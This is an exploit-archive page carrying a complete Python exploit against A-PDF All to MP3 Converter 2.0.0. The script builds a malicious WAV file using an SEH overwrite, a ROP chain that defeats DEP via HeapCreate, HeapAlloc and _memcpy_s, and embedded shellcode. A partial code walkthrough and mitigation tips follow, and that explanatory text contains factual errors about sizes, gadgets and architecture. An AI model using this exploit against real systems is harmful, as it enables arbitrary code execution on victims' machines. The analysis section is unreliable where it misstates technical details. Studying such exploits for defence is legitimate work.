A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc
Exploit Author: George Washington Analysis Author: www.bubbleslearn.ir Category: Local Language: Unknown Published Date: 2024-03-03
#!/usr/bin/python
# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain
# Date: 16 November 2023
# Exploit Author: George Washington
# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 2.0.0
# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64
# Based on: https://www.exploit-db.com/exploits/17275
# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe
# Video: https://youtu.be/_JEgdKjbtpI
import socket, struct
file = "1.wav"
size = 8000
############ Parameters for HeapCreate() ############
EXE = b"ZZZZ" # HeapCreate()
EXE += b"AAAA" # RET
EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000
EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000
EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000
EXE += b"YYYY" # HeapAlloc()
EXE += b"BBBB" # RET
EXE += b"CCCC" # Parameter 1 hHandle
EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008
EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500
EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s()
EXE += b"DDDD" # heap pointer
EXE += b"EEEE" # heap pointer
EXE += struct.pack("<I", 0x00000500) # size
EXE += b"GGGG" # shellcode pointer
EXE += struct.pack("<I", 0x00000500) # size
junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh"
####################### STACK PIVOT ###########################
SEH = struct.pack("<I", 0x005CE870) # 0x005CE870 add esp 0x800, 4 pops, ret [alltomp3.exe]
####################### 1. Get Stack Pointer to point to ZZZZ ###########################
ROP = struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xffffff1c)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to ZZZZ
####################### 2. Get and set ZZZZ to HeapCreate ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 3. Set RET ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)
ROP += struct.pack("<I", 0x1001939e) # 0x1001939e: add esp, 0x000001A0 ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
####################### 4. Go to HeapCreate ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffea4)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret ; (1 found) // pad it
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 5. Get Stack Pointer to point to YYYY ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffe58)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to YYYY
####################### 6. Get and set YYYY to HeapAlloc ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 7. Set RET ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)
ROP += struct.pack("<I", 0x10014d32) # 0x10014d32: add esp, 0x00000280 ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 8. Set hHEAP ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) <- should return here and start executing here
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
####################### 9. Go to HeapAlloc ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffdcc)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret ; (1 found) // pad it
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 10. Get Stack Pointer to point to DDDD ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffd5c)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)
ROP += b"A" * 4
# ecx points to DDDD
####################### 12. Set RET ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += b"A"*0x10
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]
####################### 13. DESTIN ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]*
####################### 14. SOURCE ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0x000000a0)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] **
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)
####################### 15. GOTO _memcpy_s ###########################
ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **
ROP += b"A" * 8
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] **
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)
ROP += struct.pack("<I", 0xfffffc94)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)
####################### SHELLCODE ###########################
shellcode = b"\xcc" * 400
real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"
real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"
real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"
real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"
real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"
real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"
real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"
real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"
real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"
real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"
real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"
real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"
real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"
real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"
real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"
real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"
real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"
real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"
real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"
real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"
####################### CONSTRUCT ###########################
SIZE = 500
start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))
start_of_padding += shellcode
start_of_padding += EXE
SIZE = 1500
RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET
#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3 ; pop esi ; ret ; (1 found)
INT = struct.pack("I", 0x1003c6aa)*2
rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172
rest_of_payload += b"\x90" * 100
rest_of_payload += real_shellcode
rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))
payload = junk + SEH + start_of_padding + rest_of_payload
REST = b"\x44" * (size-len(payload))
payload += REST
file = open("1.wav", "wb")
file.write(payload)
file.close()A-PDF All to MP3 Converter 2.0.0: DEP Bypass via HeapCreate + HeapAlloc – A Deep Dive into Exploitation Techniques
On November 16, 2023, a critical vulnerability was disclosed in A-PDF All to MP3 Converter 2.0.0, a widely used audio conversion tool for Windows systems. This exploit leverages a DEP (Data Execution Prevention) bypass mechanism using the HeapCreate and HeapAlloc functions in conjunction with a _memcpy_s call to execute arbitrary shellcode in memory. The attack, crafted by cybersecurity researcher George Washington, demonstrates how legacy software can remain a persistent threat despite modern security defenses.
Understanding the Vulnerability
DEP is a fundamental security feature introduced in modern Windows operating systems to prevent execution of code in non-executable memory regions—such as heap, stack, or data segments. While effective against many common exploits, attackers have developed sophisticated techniques to bypass DEP, especially when control over memory allocation and function calls is available.
The A-PDF All to MP3 Converter 2.0.0 vulnerability exploits a heap-based ROP (Return-Oriented Programming) chain. The core idea is to use HeapCreate to allocate a memory region with executable permissions, then HeapAlloc to reserve space within that region, and finally _memcpy_s to copy shellcode into the allocated heap space—effectively creating a self-executing payload in a previously non-executable area.
Exploit Architecture: The ROP Chain
The exploit uses a carefully constructed ROP chain that manipulates the Windows API functions through stack-based control. The sequence involves:
- HeapCreate() – Initializes a heap with specific flags (e.g.,
0x00040000for executable memory). - HeapAlloc() – Allocates a block within the created heap.
- _memcpy_s() – Copies shellcode from a source buffer into the allocated heap block.
This chain bypasses DEP because the heap is explicitly created with executable permissions, allowing shellcode execution even in systems where DEP is enabled.
Code Analysis: Exploit Implementation
#!/usr/bin/python
# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain
# Date: 16 November 2023
# Exploit Author: George Washington
# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 2.0.0
# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64
# Based on: https://www.exploit-db.com/exploits/17275
# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe
# Video: https://youtu.be/_JEgdKjbtpI
import socket, struct
file = "1.wav"
size = 8000
############ Parameters for HeapCreate() ############
EXE = b"ZZZZ" # HeapCreate()
EXE += b"AAAA" # RET
EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000
EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000
EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000
EXE += b"YYYY" # HeapAlloc()
EXE += b"BBBB" # RET
EXE += b"CCCC" # Parameter 1 hHandle
EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008
EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500
EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s()
EXE += b"DDDD" # heap pointer
EXE += b"EEEE" # heap pointer
EXE += struct.pack("<I", 0x00000500) # size
EXE += b"GGGG" # shellcode pointer
EXE += struct.pack("<I", 0x00000500) # size
Explanation: The exploit begins by constructing a payload that mimics a function call sequence. The EXE buffer is designed to be injected into the vulnerable application’s memory via a crafted .wav file (used as input).
Key components:
| Function | Role | Address/Value |
|---|---|---|
HeapCreate() | Creates a heap with executable memory flags | 0x00040000 (indicating executable heap) |
HeapAlloc() | Allocates a memory block within the heap | 0x00000500 (512 bytes) |
_memcpy_s() | Transfers shellcode into the allocated heap | 0x1002dd98 (gadget found in the binary) |
The exploit uses struct.pack("<I", ...) to pack 32-bit integers in little-endian format, ensuring compatibility with x64 Windows architecture. The AAAA, ZZZZ, etc., serve as placeholder return addresses (RET) in the ROP chain, allowing the attacker to control the flow of execution.
Why This Technique Works
Despite DEP, the exploit succeeds because:
- HeapCreate() is called with
0x00040000as thedwFlagsparameter, which includesHEAP_CREATE_EXECUTABLE—allowing the heap to be executable. - Once the heap is created,
HeapAlloc()reserves memory within it, which inherits the executable attribute. _memcpy_s()is used to copy shellcode into this heap block, effectively placing executable code in an allowed memory region.
This technique is a classic example of memory manipulation and control flow hijacking, demonstrating how attackers can exploit API functions not intended for malicious use.
Security Implications and Mitigation
While the exploit is specific to A-PDF All to MP3 Converter 2.0.0, it highlights broader issues in software security:
- Legacy software often lacks modern security features like ASLR (Address Space Layout Randomization), DEP, and safe memory handling.
- API functions like
HeapCreateandHeapAllocare inherently powerful and can be weaponized if exposed to untrusted input. - Users should avoid downloading software from unverified sources, especially if it handles file input (e.g., .wav, .pdf).
Recommendations:
- Update or replace outdated software with modern, secure alternatives.
- Disable execution of untrusted files via application sandboxing.
- Implement input validation and memory safety checks in software development.
